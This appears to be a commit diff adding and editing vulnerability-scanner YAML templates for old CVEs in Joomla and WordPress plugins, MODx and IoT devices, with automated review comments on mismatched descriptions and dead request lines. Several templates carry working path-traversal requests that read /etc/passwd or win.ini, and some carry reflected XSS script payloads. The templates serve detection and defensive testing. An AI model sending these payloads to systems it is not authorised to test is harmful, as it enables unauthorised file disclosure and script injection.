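Review bot: The `description` does not describe this template's target: it names Percha Fields Attach (`com_perchafieldsattach`) 1.x, while the `name` says Percha Categories Tree 0.6 and the `path` requests `option=com_perchacategoriestree`. The text is identical to the description in CVE-2010-2036.yaml in this same commit, so it looks like a copy-paste. Replace it with the description for the Categories Tree component, and bring the name in line with the "Joomla! Component ..." form used by the other templates.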

27
CVE-2010-2035.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2035
info:
name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34006
- https://www.cvedetails.com/cve/CVE-2010-2035
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2036.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2036
info:
name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34004
- https://www.cvedetails.com/cve/CVE-2010-2036
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2122.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2122
info:
name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12623
- https://www.cvedetails.com/cve/CVE-2010-2122
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
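
Review bot: the description and the request disagree on the injected parameter. The description places the traversal in the controller parameter to index.php, while the path sends it in fileid together with task=download. The name also says "Local File Disclosure" where the description says "include and execute arbitrary local files". Check the exploit-db reference and align the description with the request (or the request with the description), so the template documents the parameter it tests.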

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/10946 - https://www.exploit-db.com/exploits/10946
- https://www.cvedetails.com/cve/CVE-2010-2259 - https://www.cvedetails.com/cve/CVE-2010-2259
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
reference: | reference:
- https://www.securityfocus.com/bid/40550/info - https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi tags: cve,cve2010,iot,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/14017 - https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682 - https://www.cvedetails.com/cve/CVE-2010-2682
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

27
CVE-2010-3426.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-3426
info:
name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/14964
- https://www.cvedetails.com/cve/CVE-2010-3426
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
reference: | reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505 - https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi tags: cve,cve2010,iot,lfi
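
Review bot: the description line in this hunk reads "directory transversal attacks"; it should be "directory traversal". Worth correcting in the same change, since the hunk already touches the info block of this file.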

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/15791 - https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617 - https://www.cvedetails.com/cve/CVE-2010-4617
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

29
CVE-2010-5278.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2010-5278
info:
name: MODx manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
reference:
- https://www.exploit-db.com/exploits/34788
- https://www.cvedetails.com/cve/CVE-2010-5278
tags: cve,cve2010,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
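
Review bot: the only request reads windows/win.ini, so a vulnerable MODx Revolution install on a non-Windows host can never match. Either add a second path for /etc/passwd with a matcher like the "root:.*:0:0" regex used by the other LFI templates in this commit, or state in the name or description that detection is Windows-only. The description also conditions the bug on magic_quotes_gpc being disabled and the payload ends in %00, so it would help to record those preconditions in the description. The tags line has no product tag; adding modx would make the template selectable by product.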

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference: | reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119 - https://www.exploit-db.com/exploits/17119
tags: cve,cve2011,wordpress,wp-plugin,lfi tags: cve,cve2011,wordpress,wp-plugin,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/36598 - https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804 - https://www.cvedetails.com/cve/CVE-2011-4804
tags: cve,cve2011,joomla,lfi tags: cve,cve2011,joomla,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: | reference:
- https://www.exploit-db.com/exploits/36650 - https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991 - https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr tags: cve,cve2012,lfi,openemr

View File

@ -12,10 +12,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:
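
Review bot: four of the five path entries in this hunk are commented out, and the change touches them without enabling or removing them. Commented-out requests are never sent, so the title[id], args[before_widget], before_title and after_title variants stay untested. Either delete the dead lines or move them into active paths with a matcher that covers their alert(123) payload.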

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
reference: | reference:
- https://www.exploit-db.com/exploits/37129 - https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253 - https://www.cvedetails.com/cve/CVE-2012-4253
tags: cve,cve2012,lfi tags: cve,cve2012,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
reference: | reference:
- https://www.exploit-db.com/exploits/37034 - https://www.exploit-db.com/exploits/37034
- https://www.cvedetails.com/cve/CVE-2012-4878 - https://www.cvedetails.com/cve/CVE-2012-4878
tags: cve,cve2012,lfi tags: cve,cve2012,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
reference: | reference:
- https://www.securityfocus.com/bid/52841/info - https://www.securityfocus.com/bid/52841/info
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - https://nvd.nist.gov/vuln/detail/CVE-2012-4889
tags: cve,cve2012,xss,manageengine tags: cve,cve2012,xss,manageengine

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/26955 - https://www.exploit-db.com/exploits/26955
- https://www.cvedetails.com/cve/CVE-2013-5979 - https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967 - https://bugs.launchpad.net/xibo/+bug/1093967

View File

@ -5,9 +5,9 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference: | reference:
- https://www.exploit-db.com/exploits/38936 - https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi tags: cve,cve2013,wordpress,wp-plugin,lfi
requests: requests:

View File

@ -4,7 +4,7 @@ info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535 - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss tags: cve,cve2014,wordpress,wp-plugin,xss

View File

@ -4,7 +4,7 @@ info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss tags: cve,cve2014,wordpress,wp-plugin,xss

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference: | reference:
- https://www.exploit-db.com/exploits/39287 - https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368 - https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi tags: cve,cve2014,wordpress,wp-plugin,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference: | reference:
- https://www.exploit-db.com/exploits/35346 - https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799 - https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi tags: cve,cve2014,wordpress,wp-plugin,lfi

View File

@ -4,7 +4,7 @@ info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo author: daffainfo
severity: high severity: high
reference: | reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi tags: cve,cve2015,wordpress,wp-plugin,lfi

View File

@ -4,7 +4,7 @@ info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807 - https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss tags: cve,cve2015,wordpress,wp-plugin,xss

View File

@ -4,7 +4,7 @@ info:
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414
tags: cve,cve2015,wordpress,wp-plugin,xss tags: cve,cve2015,wordpress,wp-plugin,xss

View File

@ -4,7 +4,7 @@ info:
name: WordPress Plugin RobotCPA 5 - Directory Traversal name: WordPress Plugin RobotCPA 5 - Directory Traversal
author: daffainfo author: daffainfo
severity: high severity: high
reference: | reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
- https://www.exploit-db.com/exploits/37252 - https://www.exploit-db.com/exploits/37252
tags: cve,cve2015,wordpress,wp-plugin,lfi tags: cve,cve2015,wordpress,wp-plugin,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
reference: | reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism - https://wordpress.org/plugins/anti-plagiarism
tags: cve,cve2016,wordpress,xss,wp-plugin tags: cve,cve2016,wordpress,xss,wp-plugin

View File

@ -4,7 +4,7 @@ info:
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
tags: cve,cve2016,wordpress,wp-plugin,xss tags: cve,cve2016,wordpress,wp-plugin,xss

View File

@ -4,7 +4,7 @@ info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss tags: cve,cve2016,wordpress,wp-plugin,xss

View File

@ -5,7 +5,9 @@ info:
author: daffainfo,0x240x23elu author: daffainfo,0x240x23elu
severity: high severity: high
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 reference:
- https://cxsecurity.com/issue/WLB-2016080220
- https://wpvulndb.com/vulnerabilities/8609
tags: cve,cve2016,wordpress,wp-plugin,lfi tags: cve,cve2016,wordpress,wp-plugin,lfi
requests: requests:
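
Review bot: the reference change drops the only link that identifies the CVE record (cve.mitre.org, CVE-2016-10956) and replaces it with two third-party advisories. Keep a CVE or NVD entry as a third list item, as the other templates in this commit do, so the id can be checked from the template itself.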

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: critical severity: critical
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
reference: | reference:
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960

View File

@ -4,7 +4,7 @@ info:
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS) name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://www.vulnerability-lab.com/get_content.php?id=1808 - https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993
tags: cve,cve2016,wordpress,wp-theme,xss tags: cve,cve2016,wordpress,wp-theme,xss

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978. description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
reference: | reference:
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389 - https://www.cvedetails.com/cve/CVE-2016-2389
tags: cve,cve2016,lfi,sap tags: cve,cve2016,lfi,sap

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
reference: | reference:
- https://www.exploit-db.com/exploits/44054 - https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647 - https://www.cvedetails.com/cve/CVE-2017-15647
tags: cve,cve2017,lfi,router tags: cve,cve2017,lfi,router

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php. description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
reference: | reference:
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
tags: cve,cve2017,wordpress,xss,wp-plugin tags: cve,cve2017,wordpress,xss,wp-plugin

View File

@ -6,9 +6,9 @@ info:
severity: info severity: info
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress tags: cve,cve2017,wordpress
reference: | reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497 - https://www.exploit-db.com/exploits/41497
requests: requests:
- method: GET - method: GET
@ -16,6 +16,7 @@ requests:
- "{{BaseURL}}/wp-json/wp/v2/users/" - "{{BaseURL}}/wp-json/wp/v2/users/"
